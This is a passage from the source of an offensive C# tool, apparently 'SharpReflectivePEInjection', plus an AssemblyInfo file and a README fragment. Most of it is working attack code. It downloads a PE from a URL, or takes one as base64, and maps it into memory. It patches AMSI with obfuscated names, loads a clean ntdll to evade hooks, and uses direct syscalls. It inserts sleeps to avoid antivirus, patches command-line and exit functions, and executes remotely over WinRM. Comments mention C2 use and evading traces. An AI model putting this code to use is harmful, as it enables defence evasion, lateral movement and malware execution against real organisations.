$\",$bindingFlags);$method.Invoke($null, (, [string[]] {psArgs}) ) "; print("[*] Constructed a powershell oneliner"); //PrintExit(powerhsell_script); // opening a remote WinRM connection with current user context Uri WsmanUri = new Uri($"http://{ComputerName}:5985/wsman"); WSManConnectionInfo RemoteWinRM = null; WindowsIdentity CurrentUser = WindowsIdentity.GetCurrent(); if (CurrentUser != null) { string user = CurrentUser.Name; print($"[+] Identity Context: {user}"); PSCredential creds = new(user); RemoteWinRM = new(WsmanUri); RemoteWinRM.Credential = creds; } else { print("[-] couldn't find an identity to use with PSRemoting"); } // open a remote powershell unmanaged runspace using (Runspace UnManagedRunSpace = RunspaceFactory.CreateRunspace(RemoteWinRM)) { UnManagedRunSpace.Open(); // open the unmanaged runspace print("[*] opened a remote powershell runspace (unmanaged)"); using (PowerShell pwsh = PowerShell.Create()) { pwsh.Runspace = UnManagedRunSpace; pwsh.AddScript(powerhsell_script).AddCommand("Out-String"); print("[+] Suicide Burn before remote Invokation ...."); // this trick is from BetterSafetyKatz repo ;) Thread.Sleep(3268); // thats just a random number i clicked XD print("[*] Invoking stub in the remote runspace"); Thread tstdout = new Thread(() => { ReadStdOut(ComputerName); }); Thread tstderr = new Thread(() => { ReadStdErr(ComputerName); }); tstdout.Start(); tstderr.Start(); try { pwsh.Invoke(); } catch { /* me if you can ;) */ } Process.GetCurrentProcess().Kill(); // kill the current process directly after output to avoid endless execution loops } } } void ReadStdOut(string ComputerName) { Console.WriteLine("[+] starting STDOUT remote reader pipe client"); string pipeName = "stdout"; using (NamedPipeClientStream pipeClient = new NamedPipeClientStream(ComputerName, pipeName, PipeDirection.In, PipeOptions.None, TokenImpersonationLevel.Impersonation)) { pipeClient.Connect(); using (StreamReader reader = new StreamReader(pipeClient)) { string line; if ((line = reader.ReadLine()) == null) { Console.WriteLine("[i] did not receive any data on stdout pipe"); } while ((line = reader.ReadLine()) != null) { Console.WriteLine(line); } } Process.GetCurrentProcess().Dispose(); Process.GetCurrentProcess().Kill(); // killing immediatly after read so it doesn't bug out } } /* (ReadStd*) functions are made to read redirected stdout and stderr when executing PEs remotely*/ void ReadStdErr(string ComputerName) { Console.WriteLine("[+] starting STDERR remote reader pipe client"); string pipeName = "stderr"; using (NamedPipeClientStream pipeClient = new NamedPipeClientStream(ComputerName, pipeName, PipeDirection.In, PipeOptions.None, TokenImpersonationLevel.Impersonation)) { pipeClient.Connect(); using (StreamReader reader = new StreamReader(pipeClient)) { string line; int counter = 0; while ((line = reader.ReadLine()) != null) { Console.WriteLine(line); counter++; if (counter == 10) { break; } } } Console.WriteLine("[+] Disposing all resources and killing the process"); Console.WriteLine("[*] Suicide Will Take Care of Remote Cleanup (if there is any)"); Process.GetCurrentProcess().Dispose(); Process.GetCurrentProcess().Kill(); // killing immediatly after read so it doesn't bug out } } if (PSRemoting) { PSRemotingReflection(); } // calls itself reflectively on a remote machine without setting PSremoting true again void GetPE() { if (string.IsNullOrEmpty(url) && !string.IsNullOrEmpty(PE_b64)) // base64 encoding { print("[*] unpacking binary from base64 blob"); unpacked = Convert.FromBase64String(PE_b64); } if (string.IsNullOrEmpty(url) && string.IsNullOrEmpty(PE_b64) && !string.IsNullOrEmpty(fromfile)) { // get from local file print("[*] Reading Binary From File"); unpacked = File.ReadAllBytes(fromfile); } if (string.IsNullOrEmpty(PE_b64) && !string.IsNullOrEmpty(url)) // download from a url { using (WebClient downloadPE = new WebClient()) { Console.WriteLine($"[*] Downloading PE from {url}"); unpacked = downloadPE.DownloadData(url); } } } GetPE(); if (string.IsNullOrEmpty(url) && string.IsNullOrEmpty(PE_b64) && string.IsNullOrEmpty(fromfile)) { print("usage: .\\SharpReflectivePEInjection.exe -url http://10.10.10.10/exe.exe [Optional: -Args \"\"]"); print("usage: .\\SharpReflectivePEInjection.exe -b64PE [Optional: -Args \"\"]"); print("usage: .\\SharpReflectivePEInjection.exe -url http://10.10.10.10/exe.exe -ComputerName server.ad.local [Optional: -Args \"\"]"); print("\nfor full help: .\\SharpReflectivePEInjection.exe -h "); exit(); } // mapping DLLs PE_MANUAL_MAP ntdll = new(); if (!useSysCalls) { ntdll = Map.MapModuleFromDisk(@"C:\Windows\System32\ntdll.dll"); /* Replaced Map.MapModuleToMemory with Map.MapModuleFromDisk to make it work with x32 */ Console.WriteLine("[*] Mapped a clean version of ntdll (no hooks here)"); } else { print("[*] using SysCalls, Will Not Map ntdll"); } // NtAllocate IntPtr ntva_ptr; if (useSysCalls) { ntva_ptr = GetSyscallStub("NtAllocateVirtualMemory"); } else { ntva_ptr = GetExportAddress(ntdll.ModuleBase, "NtAllocateVirtualMemory"); } NtAllocateVirtualMemory NtAllocateVirtualMemory = Marshal.GetDelegateForFunctionPointer(ntva_ptr); // //NtProtect (the only way i was able to get it to work) IntPtr ntvp_ptr; if (useSysCalls) { ntvp_ptr = GetSyscallStub("NtProtectVirtualMemory"); } else { ntvp_ptr = GetExportAddress(ntdll.ModuleBase, "NtProtectVirtualMemory"); } object NtProtectVirtualMemory(IntPtr pHandle, IntPtr Address, IntPtr NtSize, uint AccessMask, uint OldProtection) { object[] NtVPArgs = { pHandle, Address, NtSize, AccessMask, OldProtection }; return DynamicFunctionInvoke(ntvp_ptr, typeof(NtProtectVirtualMemory), ref NtVPArgs); } // // NtFree IntPtr ntvf_ptr; if (useSysCalls) { ntvf_ptr = GetSyscallStub("NtFreeVirtualMemory"); } else { ntvf_ptr = GetExportAddress(ntdll.ModuleBase, "NtFreeVirtualMemory"); } NtFreeVirtualMemory NtFreeVirtualMemory = Marshal.GetDelegateForFunctionPointer(ntvf_ptr); // // NtCreateThreadEx IntPtr ntct_ptr; if (useSysCalls) { ntct_ptr = GetSyscallStub("NtCreateThreadEx"); } else { ntct_ptr = GetExportAddress(ntdll.ModuleBase, "NtCreateThreadEx"); } NtCreateThreadEx NtCreateThreadEx = Marshal.GetDelegateForFunctionPointer(ntct_ptr); // // NtClose IntPtr ntc; if (useSysCalls) { ntc = GetSyscallStub("NtClose"); } else { ntc = GetExportAddress(ntdll.ModuleBase, "NtClose"); } NtClose NtClose = Marshal.GetDelegateForFunctionPointer(ntc); // //NtWaitForSingleObject IntPtr NtWait; // direct syscall made easy XD, i fuckin love D/Invoke if (useSysCalls) { NtWait = GetSyscallStub("NtWaitForSingleObject"); } else { NtWait = GetExportAddress(ntdll.ModuleBase, "NtWaitForSingleObject"); } NtWaitForSingleObject NtWaitForSingleObject = Marshal.GetDelegateForFunctionPointer(NtWait); //kernelbase.dll functions IntPtr SetStdptr = GetLibraryAddress("kernelbase.dll", "SetStdHandle", true); SetStdHandle SetStdHandle = Marshal.GetDelegateForFunctionPointer(SetStdptr); IntPtr HandleInfoptr = GetLibraryAddress("kernelbase.dll", "SetHandleInformation", true); ; SetHandleInformation SetHandleInformation = Marshal.GetDelegateForFunctionPointer(HandleInfoptr); // // constants const uint MEM_COMMIT = 0x1000; const uint PAGE_EXECUTE_READWRITE = 0x40; const uint PAGE_EXECUTEREAD = 0x20; const uint PAGE_READWRITE = 0x04; const uint THREAD_ALL_ACCESS = 0x1FFFFF; // void AmziPatcher() { // patching A.M.S.I, //will add AES decryption routine to obfuscate the names try { uint OldProtection = 0; IntPtr func = GetLibraryAddress("a"+"m"+"s"+"i"+".dll", "A"+"m"+"s"+"i"+"S"+"c"+"a"+"n"+"B"+"u"+"f"+"f"+"e"+"r", true); // return arch appropriat patch, patch from rasta mouse byte[] patch = IntPtr.Size == 8 ? new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 } : new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; IntPtr NtPatchSize = new IntPtr(patch.Length); _ = NtProtectVirtualMemory(new IntPtr(-1), func, NtPatchSize, PAGE_READWRITE, OldProtection); Marshal.Copy(patch, 0, func, patch.Length); print("[*] Patched A.M.Z.I!"); _ = NtProtectVirtualMemory(new IntPtr(-1), func, NtPatchSize, OldProtection, OldProtection); } catch {/* pokemon */} } AmziPatcher(); IMAGE_DOS_HEADER dosHeader = new(); IMAGE_OPTIONAL_HEADER64 OptionalHeader64 = new(); IMAGE_OPTIONAL_HEADER32 OptionalHeader32 = new(); IMAGE_FILE_HEADER FileHeader = new(); IMAGE_SECTION_HEADER[] ImageSectionHeaders; bool Is32bitPE = false; // CaseySmith's PELoader Constructor, but modified to DInvoke using (MemoryStream stream = new MemoryStream(unpacked, 0, unpacked.Length)) { BinaryReader reader = new BinaryReader(stream); dosHeader = FromBinaryReader(reader); // Add 4 bytes to the offset stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin); UInt32 ntHeadersSignature = reader.ReadUInt32(); FileHeader = FromBinaryReader(reader); UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100; bool Is32BitHeader = (IMAGE_FILE_32BIT_MACHINE & FileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE; if (Is32BitHeader) { OptionalHeader32 = FromBinaryReader(reader); Is32bitPE = true; } else { OptionalHeader64 = FromBinaryReader(reader); } ImageSectionHeaders = new IMAGE_SECTION_HEADER[FileHeader.NumberOfSections]; for (int headerNo = 0; headerNo < ImageSectionHeaders.Length; ++headerNo) { ImageSectionHeaders[headerNo] = FromBinaryReader(reader); } // after populating close and dispose all memory resources of BinaryReader reader.Dispose(); reader.Close(); } static T FromBinaryReader(BinaryReader reader) // CaseySmith's PELoader FromBinaryReader Method { byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T))); GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned); T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T)); handle.Free(); return theStructure; } if (Is32bitPE) { print("[*] Loading 32-bit PE, x86 memory layout will apply"); } else { print("[*] Loading 64-bit PE, x64 memory layout will apply"); } uint SizeOfImage = Is32bitPE == true ? OptionalHeader32.SizeOfImage : OptionalHeader64.SizeOfImage; IntPtr NtSizeOfImage = new IntPtr(SizeOfImage); IntPtr CurrentProcessHandle = (IntPtr)(-1); IntPtr codebase = IntPtr.Zero; NtAllocateVirtualMemory((IntPtr)(-1), ref codebase, IntPtr.Zero, ref NtSizeOfImage, MEM_COMMIT, PAGE_READWRITE); // Copy Sections for (int SectionIndex = 0; SectionIndex < FileHeader.NumberOfSections; SectionIndex++) { IntPtr SectionAddress = IntPtr.Add(codebase, (int)ImageSectionHeaders[SectionIndex].VirtualAddress); uint SectionSize = ImageSectionHeaders[SectionIndex].SizeOfRawData; IntPtr NtSectionSize = new IntPtr(SectionSize); if (SectionSize != 0) { NtAllocateVirtualMemory(CurrentProcessHandle, ref SectionAddress, IntPtr.Zero, ref NtSectionSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(unpacked, (int)ImageSectionHeaders[SectionIndex].PointerToRawData, SectionAddress, (int)SectionSize); } else continue; } print("[*] Mapped Sections"); // if there is any errors its mostly comming from here, its not always DNS, its always Relocations :\ // relocations var ImageBase = Is32bitPE == true ? OptionalHeader32.ImageBase : OptionalHeader64.ImageBase; var delta = Is32bitPE == true ? codebase.ToInt32() - (int)ImageBase : codebase.ToInt64() - (long)ImageBase; var BaseRelocationRVA = Is32bitPE == true ? OptionalHeader32.BaseRelocationTable.VirtualAddress : OptionalHeader64.BaseRelocationTable.VirtualAddress; IntPtr RelocationTablePtr = IntPtr.Add(codebase, (int)BaseRelocationRVA); IMAGE_BASE_RELOCATION ImageBaseRelocation = new(); ImageBaseRelocation = Marshal.PtrToStructure(RelocationTablePtr); int ImageSizeOfBaseRelocation = Marshal.SizeOf(); int SizeOfRelocationBlock = (int)ImageBaseRelocation.SizeOfBlock; IntPtr pRelocationTablePtr = RelocationTablePtr; // using a pointer to a pointer ??? --__('')__-- while (true) { IMAGE_BASE_RELOCATION ImageBaseRelocation2 = new(); IntPtr NextRelocationBlock = IntPtr.Add(RelocationTablePtr, SizeOfRelocationBlock); ImageBaseRelocation2 = Marshal.PtrToStructure(NextRelocationBlock); IntPtr RelocationBlockAddress = IntPtr.Add(codebase, (int)ImageBaseRelocation.VirtualAdress); int RelocationEntriesinBlock = (int)((ImageBaseRelocation.SizeOfBlock - ImageSizeOfBaseRelocation) / 2); for (int i = 0; i < RelocationEntriesinBlock; i++) { UInt16 RelocationEntry = (UInt16)Marshal.ReadInt16(pRelocationTablePtr, ImageSizeOfBaseRelocation + (2 * i)); UInt16 type = (UInt16)(RelocationEntry >> 12); UInt16 AddressToFix = (UInt16)(RelocationEntry & 0xfff); switch (type) { case 0x0: break; case 0xA: // PE32+ IntPtr PatchAddress = IntPtr.Add(RelocationBlockAddress, AddressToFix); long OriginalAddress = Marshal.ReadInt64(PatchAddress); Marshal.WriteInt64(PatchAddress, OriginalAddress + delta); break; case 0x3: // PE32 IntPtr PatchAddress32 = IntPtr.Add(RelocationBlockAddress, AddressToFix); int OriginalAddress32 = Marshal.ReadInt32(PatchAddress32); Marshal.WriteInt32(PatchAddress32, OriginalAddress32 + (int)delta); break; } } pRelocationTablePtr = IntPtr.Add(RelocationTablePtr, SizeOfRelocationBlock); SizeOfRelocationBlock += (int)ImageBaseRelocation2.SizeOfBlock; ImageBaseRelocation = ImageBaseRelocation2; if (ImageBaseRelocation2.SizeOfBlock == 0) break; } print("[*] Performed Relocations"); // Resolving Imports, Dancing in the IAT int IMBORT_DIRECTORY_TABLE_ENTRY_LENGTH = 20; int IDT_IAT_OFFSET = 16; int DLL_NAME_RVA_OFFSET = 12; int IMPORT_LOOKUP_TABLE_HINT = 2; var IMPORT_TABLE_SIZE = Is32bitPE == true ? (int)OptionalHeader32.ImportTable.Size : (long)OptionalHeader64.ImportTable.Size; int ImportTableRVA = Is32bitPE == true ? (int)OptionalHeader32.ImportTable.VirtualAddress : (int)OptionalHeader64.ImportTable.VirtualAddress; int SizeOfImportDescriptorStruct = Marshal.SizeOf(); var NumberOfDlls = IMPORT_TABLE_SIZE / SizeOfImportDescriptorStruct; IntPtr pIDT = IntPtr.Add(codebase, ImportTableRVA); for (int DllIndex = 0; DllIndex < NumberOfDlls; DllIndex++) { IntPtr pImageImportDescriptor = IntPtr.Add(pIDT, IMBORT_DIRECTORY_TABLE_ENTRY_LENGTH * DllIndex); IntPtr dllNameRva = IntPtr.Add(pImageImportDescriptor, DLL_NAME_RVA_OFFSET); IntPtr dllNamePtr = IntPtr.Add(codebase, Marshal.ReadInt32(dllNameRva)); string DllName = Marshal.PtrToStringAnsi(dllNamePtr); if (string.IsNullOrEmpty(DllName)) { break; } IntPtr Handle2Dll; //if (DllName.ToLower() == "kernel32.dll") { Handle2Dll = kernel32.ModuleBase; } // if the loaded PE uses kernel32, it will use the mapped clean version if (DllName.ToLower() == "ntdll.dll") { Handle2Dll = ntdll.ModuleBase; } // same here for ntdll Handle2Dll = LoadModuleFromDisk(DllName); // LdrLoadDll Console.Write($"\r[+] slowly loading DLLs: {DllName} \r"); Console.Write("\r"); int IAT_RVA = Marshal.ReadInt32(pImageImportDescriptor, IDT_IAT_OFFSET); IntPtr IATPtr = IntPtr.Add(codebase, IAT_RVA); while (true) { IntPtr DllFuncNamePtr = IntPtr.Add(codebase, Marshal.ReadInt32(IATPtr) + IMPORT_LOOKUP_TABLE_HINT); string DllFuncName = Marshal.PtrToStringAnsi(DllFuncNamePtr); if (string.IsNullOrEmpty(DllFuncName)) { break; } // sanity IntPtr FuncAddress= GetNativeExportAddress(Handle2Dll, DllFuncName); // LdrGetProcedureAddress var IntFunctionAddress = Is32bitPE == true ? FuncAddress.ToInt32() : FuncAddress.ToInt64(); if (Is32bitPE) { Marshal.WriteInt32(IATPtr, (int)IntFunctionAddress); } else { Marshal.WriteInt64(IATPtr, (long)IntFunctionAddress); } IATPtr = IntPtr.Add(IATPtr, IntPtr.Size); Thread.Sleep(31); // slowing down to not trigger AV } } print("[*] Loaded Dlls and Fixed Import Access Table"); // cmdline hijacking string ExeArgs = $" {Args}"; // needs a white space prefix if (!string.IsNullOrEmpty(Args)) { print($"[*] Passing [{Args}] to EXE"); } void PatchGetCommandLineX() // reference Invoke-ReflectivePEinjection.ps1, Lines: 1966 - 2125 { int PtrSize = IntPtr.Size; // 32Bit=4, 64bit=8 IntPtr hKernelBase = GetPebLdrModuleEntry("kernelbase.dll"); IntPtr CLIWptr = Marshal.StringToHGlobalUni(ExeArgs); IntPtr CLIAptr = Marshal.StringToHGlobalAnsi(ExeArgs); // GetCommandLineA address from kernelbase.dll IntPtr GetCommandLineAaddr = GetExportAddress(hKernelBase, "GetCommandLineA"); // GetCommandLineW address from kernelbase.dll IntPtr GetCommandLineWaddr = GetExportAddress(hKernelBase, "GetCommandLineW"); byte[] AssemblyPatch; if (!Is32bitPE) { AssemblyPatch = new byte[] { 0x48, 0xb8 }; // MOV REX.W // prepares the cpu for x64 instructions } else { AssemblyPatch = new byte[] { 0xb8 }; // MOV, if x86 } byte[] RET = { 0xc3 }; uint TotalSize; TotalSize = (uint)(AssemblyPatch.Length + PtrSize + RET.Length); IntPtr NtTotalSize = new IntPtr(TotalSize); uint OldProtection = 0; byte[] Nulls = new byte[TotalSize]; for (int i = 0; i < Nulls.Length; i++) { Nulls[i] += 0x00; } // overwriting GetCommandLineA NtProtectVirtualMemory(new IntPtr(-1), GetCommandLineAaddr, NtTotalSize, PAGE_READWRITE, OldProtection); Marshal.Copy(Nulls.ToArray(), 0, GetCommandLineAaddr, Nulls.Length); Marshal.Copy(AssemblyPatch, 0, GetCommandLineAaddr, AssemblyPatch.Length); GetCommandLineAaddr = IntPtr.Add(GetCommandLineAaddr, AssemblyPatch.Length); Marshal.StructureToPtr(CLIAptr, GetCommandLineAaddr, true); // puts the CLIAptr string in GetCommandLineAptr memory address GetCommandLineAaddr = IntPtr.Add(GetCommandLineAaddr, PtrSize); Marshal.Copy(RET, 0, GetCommandLineAaddr, RET.Length); NtProtectVirtualMemory(new IntPtr(-1), GetCommandLineAaddr, NtTotalSize, PAGE_EXECUTEREAD, OldProtection); Thread.Sleep(20); // overwriting GetCommandLineW NtProtectVirtualMemory(new IntPtr(-1), GetCommandLineWaddr, NtTotalSize, PAGE_READWRITE, OldProtection); Marshal.Copy(Nulls.ToArray(), 0, GetCommandLineWaddr, Nulls.Length); Marshal.Copy(AssemblyPatch, 0, GetCommandLineWaddr, AssemblyPatch.Length); GetCommandLineWaddr = IntPtr.Add(GetCommandLineWaddr, AssemblyPatch.Length); Marshal.StructureToPtr(CLIWptr, GetCommandLineWaddr, true); // puts the CLIAptr string in GetCommandLineAptr memory address GetCommandLineWaddr = IntPtr.Add(GetCommandLineWaddr, PtrSize); Marshal.Copy(RET, 0, GetCommandLineWaddr, RET.Length); NtProtectVirtualMemory(new IntPtr(-1), GetCommandLineWaddr, NtTotalSize, PAGE_EXECUTEREAD, OldProtection); Thread.Sleep(20); if (!string.IsNullOrEmpty(ExeArgs)) { print("[*] Patched args !"); } NtClose(hKernelBase); Marshal.FreeHGlobal(CLIAptr); Marshal.FreeHGlobal(CLIWptr); } void Patch_xcmdln() // adding support to Native C/C++ args like (argv[0]) to make it fully compatible with anything { uint OldProtect; uint NtOld = 0; IntPtr hDll = GetPebLdrModuleEntry("msvcrt.dll"); // without using DInvoke and Native C# structures to acces the PEB it won't work if (hDll == IntPtr.Zero) { print("[-] could not load msvcrt.dll, non windows api args will not be patched"); } IntPtr Wcmdlineaddr = GetExportAddress(hDll, "_wcmdln"); IntPtr Acmdlineaddr = GetExportAddress(hDll, "_acmdln"); IntPtr NewPtra_cmdln = Marshal.StringToHGlobalAnsi(ExeArgs); IntPtr NewPtrw_cmdln = Marshal.StringToHGlobalAnsi(ExeArgs); IntPtr NtSize = new IntPtr(IntPtr.Size); // patch a_cmdln NtProtectVirtualMemory((IntPtr)(-1), Acmdlineaddr, NtSize, PAGE_READWRITE, NtOld); Marshal.StructureToPtr(NewPtra_cmdln, Acmdlineaddr, true); NtProtectVirtualMemory((IntPtr)(-1), Acmdlineaddr, NtSize, NtOld, NtOld); // patch W_cmdln NtProtectVirtualMemory((IntPtr)(-1), Acmdlineaddr, NtSize, PAGE_READWRITE, NtOld); Marshal.StructureToPtr(NewPtrw_cmdln, Wcmdlineaddr, true); NtProtectVirtualMemory((IntPtr)(-1), Acmdlineaddr, NtSize, NtOld, NtOld); NtClose(hDll); Marshal.FreeHGlobal(NewPtra_cmdln); Marshal.FreeHGlobal(NewPtrw_cmdln); } void PatchExit() // guess what, YEP referencing Invoke-ReflectivePEInjection.ps1 again, these people are awesome!!! { print("[*] Patching Exit mechanism to ExitThread"); var ExitFunctions = new List(); IntPtr hMscoree = GetPebLdrModuleEntry("mscoree.dll"); if (hMscoree == IntPtr.Zero) { print("did not find mscoree.dll"); } IntPtr hkernel32 = GetPebLdrModuleEntry("kernel32.dll"); if (hkernel32 == IntPtr.Zero) { print("did not find kernel32.dll, WTF kind of windows doesn't have kernel32"); } IntPtr CorExitProcaddr = GetExportAddress(hMscoree, "CorExitProcess"); IntPtr ExitProcAddr = GetExportAddress(hkernel32, "ExitProcess"); if (ExitProcAddr == IntPtr.Zero) { print("did not find ExitProcess"); } ExitFunctions.Add(CorExitProcaddr); ExitFunctions.Add(ExitProcAddr); uint OldProtection = 0; foreach (IntPtr Function in ExitFunctions) { IntPtr FunctionAddr = Function; byte[] AssemblyPatch; byte[] AssemblyPatch2; if (Is32bitPE) // x86 assembly to patch { AssemblyPatch = new byte[] { 0xbb }; AssemblyPatch2 = new byte[] { 0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb }; } else // guess it { AssemblyPatch = new byte[] { 0x48, 0xbb }; AssemblyPatch2 = new byte[] { 0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb }; } byte[] CALL_MODRM = { 0xff, 0xd3 }; int TotalSize = AssemblyPatch.Length + IntPtr.Size + AssemblyPatch2.Length + IntPtr.Size + CALL_MODRM.Length; IntPtr NtTotalSize = new IntPtr(TotalSize); IntPtr DonyBytePtr = Marshal.AllocHGlobal(1); IntPtr ExitThreadAddr = GetExportAddress(hkernel32, "ExitThread"); _ = NtProtectVirtualMemory(new IntPtr(-1), FunctionAddr, NtTotalSize, PAGE_READWRITE, OldProtection); Marshal.Copy(AssemblyPatch, 0, FunctionAddr, AssemblyPatch.Length); FunctionAddr = IntPtr.Add(FunctionAddr, AssemblyPatch.Length); Marshal.StructureToPtr(DonyBytePtr, FunctionAddr, false); FunctionAddr = IntPtr.Add(FunctionAddr, IntPtr.Size); Marshal.Copy(AssemblyPatch2, 0, FunctionAddr, AssemblyPatch2.Length); FunctionAddr = IntPtr.Add(FunctionAddr, AssemblyPatch2.Length); Marshal.StructureToPtr(ExitThreadAddr, FunctionAddr, false); FunctionAddr = IntPtr.Add(FunctionAddr, IntPtr.Size); Marshal.Copy(CALL_MODRM, 0, FunctionAddr, CALL_MODRM.Length); _= NtProtectVirtualMemory(new IntPtr(-1), FunctionAddr, NtTotalSize, PAGE_EXECUTEREAD, OldProtection); Marshal.FreeHGlobal(DonyBytePtr); } NtClose(hMscoree); NtClose(hkernel32); } void RedirectStd(){ // Redirects stds, (i know how nasty that sounds, keep it your pants XD) // stdout and stderr are captured var stdout = new NamedPipeServerStream("stdout", PipeDirection.Out); var stderr = new NamedPipeServerStream("stderr", PipeDirection.Out); IntPtr stdoutPIPEHandle = stdout.SafePipeHandle.DangerousGetHandle(); IntPtr stderrPIPEHandle = stderr.SafePipeHandle.DangerousGetHandle(); bool OUTinherit = SetHandleInformation(stdoutPIPEHandle, 0x00000001, 0x00000001); if (!OUTinherit) { Console.WriteLine("[-] Error in Configuring stdout pipe"); } bool ERRinherit = SetHandleInformation(stderrPIPEHandle, 0x00000001, 0x00000001); if (!ERRinherit) { Console.WriteLine("[-] Error in Configuring stderr pipe"); } SetStdHandle(-11, stdoutPIPEHandle); // as easy as it gets XD SetStdHandle(-12, stderrPIPEHandle); // as easy as it gets XD stdout.WaitForConnection(); stderr.WaitForConnection(); } void CleanOnExitEvent() // reason behind is to properly clean the memory on CTRL-C press { uint old = 0; IntPtr ReleaseAllMemory = IntPtr.Zero; uint p = (uint)NtProtectVirtualMemory(new IntPtr(-1), codebase, NtSizeOfImage, PAGE_READWRITE, old); if (p != 0) { print("[-] Error in changing Memory Protection for Cleanup"); } byte[] zeroes = new byte[SizeOfImage]; for (var i = 0; i < zeroes.Length; i++) { zeroes[i] = 0x00; } Marshal.Copy(zeroes.ToArray(), 0, codebase, (int)SizeOfImage); print("\n[*] Zeroed-Out all the memory"); uint f = NtFreeVirtualMemory(new IntPtr(-1), ref codebase, ref ReleaseAllMemory, 0x00008000); // decommit and release at the same time if (f != 0) { print("[-] Error in Freeing the Allocated Memory for Cleanup"); } print("[*] Freed all allocated memory"); if (!useSysCalls) { Map.FreeModule(ntdll); print("[*] Freed Mapped ntdll"); } Process.GetCurrentProcess().Kill(); } void Suicide() { Thread.Sleep(15000); Process.GetCurrentProcess().Dispose(); Process.GetCurrentProcess().Kill(); /* if a problem happened during remote execution and the Execution didn't end properly, resources including created NamedPipes and Remote Runspaces are not disposed properly which causes 2 things, leaves IOCs on the remote machine prevents further remote reflections due to confusion in NamedPipe Communications this ensures that everytime a remote execution occurs after 15 seconds of Invoking the PE, it will close itself automatically despite any problems that may cause hanging, so we don't have to worry about cleaning up */ } void LocalSuicide() { Thread.Sleep(90000); Process.GetCurrentProcess().Dispose(); Process.GetCurrentProcess().Kill(); /* same as Suicide() but for local execution, this function is made to ensure reliable use with C2 channels if the PE did not exit properly in cmd session we can press CTRL-C and thats it but with C2 due to beaconing and multithreaded executions its not that simple, this ensures even if the PE errored and did not exit, that after 1.5 Mins it effectively will. the time the function waits before killing the process is 1.5 Mins, way longer than Suicide() to not interfere with actual execution */ } void ExitEvent() { Console.CancelKeyPress += (sender, eArgs) => { // on exit , clean up everything CleanOnExitEvent(); Process.GetCurrentProcess().Kill(); }; } PatchGetCommandLineX(); Patch_xcmdln(); if (PatchExitProcs) { PatchExit(); } ExitEvent(); int AddressOfEntryPoint = Is32bitPE == true ? (int)OptionalHeader32.AddressOfEntryPoint : (int)OptionalHeader64.AddressOfEntryPoint; IntPtr threadStart = IntPtr.Add(codebase, AddressOfEntryPoint); IntPtr hThread = IntPtr.Zero; print("[+] Suicide Burn before Execution...."); // this trick is from BetterSafetyKatz repo ;) Thread.Sleep(4219); if (RedirectOutPut) { RedirectStd(); Thread suicide = new(()=> { Suicide(); }); suicide.Start(); } if (!RedirectOutPut && !DisableLocalSuicide) { Thread LS = new(() => { LocalSuicide(); }); LS.Start(); } NtCreateThreadEx(ref hThread, THREAD_ALL_ACCESS, IntPtr.Zero, new IntPtr(-1), threadStart, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero); NtWaitForSingleObject(hThread, false, IntPtr.Zero); CleanOnExitEvent(); // most of the time its not reachable but it is useful when its reachable // function Delegates definitions [UnmanagedFunctionPointer(CallingConvention.StdCall)] public delegate uint NtAllocateVirtualMemory( IntPtr processHandle, // pseudo handle to the current process (IntPtr)(-1) ref IntPtr allocatedAddress, // NtAllocateVirtualMemory will fill up this parameter with the allocated memory IntPtr zeroBits, // ZERO IntPtr.Zero ref IntPtr regionSize, // (IntPtr)OptionalHeader.SizeOfImage uint allocationType, uint memoryProtection ); [UnmanagedFunctionPointer(CallingConvention.StdCall)] public delegate IntPtr NtClose(IntPtr HANDLE); [UnmanagedFunctionPointer(CallingConvention.StdCall)] public delegate uint NtProtectVirtualMemory( IntPtr processHandle, ref IntPtr baseAddress, ref IntPtr regionSize, uint newProtect, ref uint oldProtect ); [UnmanagedFunctionPointer(CallingConvention.StdCall)] public delegate uint NtFreeVirtualMemory( IntPtr processHandle, ref IntPtr baseAddress, ref IntPtr regionSize, uint freeType ); [UnmanagedFunctionPointer(CallingConvention.StdCall)] public delegate uint NtCreateThreadEx( ref IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool createSuspended, int stackZeroBits, int sizeOfStack, int maximumStackSize, IntPtr attributeList ); [UnmanagedFunctionPointer(CallingConvention.StdCall)] public delegate IntPtr NtWaitForSingleObject(IntPtr HANDLE, bool BOOL, IntPtr Handle); // kernelbase.dll [UnmanagedFunctionPointer(CallingConvention.StdCall)] public delegate bool SetHandleInformation(IntPtr hObject, int dwMask, int dwFlags); [UnmanagedFunctionPointer(CallingConvention.StdCall)] public delegate bool SetStdHandle(int nStdHandle, IntPtr hHandle); ================================================ FILE: Properties/AssemblyInfo.cs ================================================ using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; // General Information about an assembly is controlled through the following // set of attributes. Change these attribute values to modify the information // associated with an assembly. [assembly: AssemblyTitle("SharpReflectivePEInjection")] [assembly: AssemblyDescription("")] [assembly: AssemblyConfiguration("")] [assembly: AssemblyCompany("")] [assembly: AssemblyProduct("")] [assembly: AssemblyCopyright("")] [assembly: AssemblyTrademark("")] [assembly: AssemblyCulture("")] // Setting ComVisible to false makes the types in this assembly not visible // to COM components. If you need to access a type in this assembly from // COM, set the ComVisible attribute to true on that type. [assembly: ComVisible(false)] // The following GUID is for the ID of the typelib if this project is exposed to COM [assembly: Guid("fa483103-816e-464a-a227-8042d77acbb4")] // Version information for an assembly consists of the following four values: // // Major Version // Minor Version // Build Number // Revision // // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] [assembly: AssemblyVersion("1.3.3.7")] [assembly: AssemblyFileVersion("1.3.3.7")] ================================================ FILE: README.md ================================================ # SharpReflectivePEInjection # **Update: fixed x32 loading issue and till now syscalls are not working with x32 applications** thanks to MexHigh for 